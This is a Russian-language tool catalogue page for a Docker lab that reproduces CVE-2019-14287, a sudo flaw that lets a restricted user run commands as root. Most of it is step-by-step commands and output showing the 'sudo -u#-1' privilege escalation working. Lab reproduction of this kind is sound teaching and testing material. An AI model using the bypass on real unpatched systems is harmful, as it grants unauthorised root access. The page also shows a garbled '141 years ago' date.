Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
poc-cve-2019-14287 — Docker-based PoC, демонстрирующий повышение привилегий sudo через обход ограничения пользователя Runas (CVE-2019-14287), с пошаговыми инструкциями по воспроизведению. | Kitploit
Инструменты/GitHubGitHub/lemonadern/poc-cve-2019-14287
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеЛаборатории и Практика
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

Docker-based PoC, демонстрирующий повышение привилегий sudo через обход ограничения пользователя Runas (CVE-2019-14287), с пошаговыми инструкциями по воспроизведению.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
141 год назадЕщё не проверено

PoC уязвимости CVE-2019-14287

Обзор

Пример воспроизведения уязвимости sudo (CVE-2019-14287) в Docker-контейнере.

Инструкция по выполнению

  1. Запустите контейнер с помощью docker compose up -d
  2. Войдите в контейнер с помощью docker exec -it vulnerable_sudo_app bash
  3. Выполните команды whoami и id, чтобы убедиться, что вы обычный пользователь (не root)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. Убедитесь, что команды sudo -u#0 whoami и sudo -u#0 id -u не выполняются
    • Попробуйте выполнить с uid=0 (root) с помощью опции -u
    • Будет запрошен пароль, но вы его не знаете, поэтому команда не выполнится
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. Выполните sudo -u#-1 whoami и sudo -u#-1 id -u, чтобы убедиться, что команды выполняются от root без аутентификации (воспроизведение уязвимости)
    • То же самое можно сделать с -u#4294967295
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

Ссылки

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • Обзор уязвимости sudo (CVE-2019-14287) на Qiita
Скачать инструмент